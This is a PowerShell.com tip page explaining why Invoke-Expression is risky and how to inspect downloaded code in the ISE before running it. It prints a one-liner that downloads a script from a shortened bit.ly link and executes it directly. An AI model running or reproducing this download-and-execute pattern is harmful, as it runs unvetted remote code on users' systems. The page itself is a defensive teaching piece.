PowerShell Scripts, Tips, Expert Advices, Forums, and Resources

Geek Sync Live

Welcome to PowerShell.com, the educational and community site for Windows PowerShell People. Get a quick overview.

Latest Blog Posts

08-24-2016 - Road Trips
08-24-2016 - Smuggling In PowerShell Code
08-23-2016 - They’re Gone…

As a Powershell.com member you will have access to:

  • Daily PowerShell tips written by Microsoft MVPs and other leading Windows PowerShell experts
  • Free Windows PowerShell advice and training provided by Microsoft MVPs and other leading Windows PowerShell experts
  • Access to leading Windows PowerShell blogs
  • A free ebook, Mastering PowerShell, written by Microsoft MVP Dr. Tobias Weltner
PowerTip of the Day

Smuggling In PowerShell Code

PowerShell 2

There is a good reason why Invoke-Expression is considered risky. This cmdlet executes whatever string it gets, and attackers can download malicious code from the Internet, bypass script analysis, and execute it. Here is a benign example of what a simple one-liner can turn into, written by Lee Holmes from the PowerShell team:

Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')

If you don’t trust this code, you might want to remove Invoke-Expression and view the source code that is downloaded from the web. If you are working with the PowerShell ISE, you can use this code to download the source code directly into an editor tab:

$file = $psise.CurrentPowerShellTab.Files.Add()
$file.Editor.Text = (New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')
$file.Editor.SetCaretPosition(1,1)

Twitter This Tip! ReTweet this Tip!

Copyright 2012 PowerShell.com. All rights reserved.